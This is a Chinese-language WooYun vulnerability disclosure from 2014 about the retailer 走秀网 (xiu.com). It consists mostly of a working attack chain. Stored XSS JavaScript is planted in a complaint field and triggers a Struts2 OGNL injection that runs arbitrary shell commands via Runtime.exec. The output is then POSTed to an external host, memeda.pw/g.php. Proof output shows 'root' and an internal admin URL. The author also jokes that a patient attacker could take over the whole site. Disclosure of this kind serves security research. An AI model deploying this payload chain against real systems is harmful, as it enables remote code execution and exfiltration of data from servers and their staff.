当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076002

漏洞标题:走秀网利用XSS+STRUCT2任意执行命令

相关厂商:走秀网

漏洞作者: 姿势不行

提交时间:2014-09-13 19:30

修复时间:2014-09-18 19:32

公开时间:2014-09-18 19:32

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-13: 细节已通知厂商并且等待厂商处理中
2014-09-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

XSS+STRUCT2漏洞检测内网

详细说明:

QQ截图20140913190935.jpg

在吐槽处插入XSS代码

function up_data(data)
{
var up_result;
var data=encodeURIComponent(data);
var mlhttp=new XMLHttpRequest();
mlhttp.onreadystatechange=function()
{
if(mlhttp.readyState==4)
{
up_result=mlhttp.responseText;
}
}
mlhttp.open("POST","http://www.memeda.pw/g.php",true);
mlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
mlhttp.send("data="+data);
}
function get_web_by_get(url){
var lhttp=new XMLHttpRequest();
var get_result;
lhttp.onreadystatechange=function()
{if(lhttp.readyState==4)
{
get_result=lhttp.responseText;
}
}
lhttp.open("GET",url,false)
lhttp.send();
return get_result;
}
var sdata=get_web_by_get("/toViewFeedBack.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\\43webRootzpro\\75@java.lang.Runtime@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[51020]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=whoami");
up_data(sdata);

漏洞证明:

2014-09-13 14:59:43-IP:113.98.252.129-Url: http://csc.xiu.com/updateComplaintBillsStatus.action?statusNum=1&feedback.show=0&Id=27473&feedback.id=27473
root

修复方案:

T_T都懂,耐心足的应该可以把网站翻了吧~~

版权声明:转载请注明来源 姿势不行@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-18 19:32

厂商回复:

最新状态:

暂无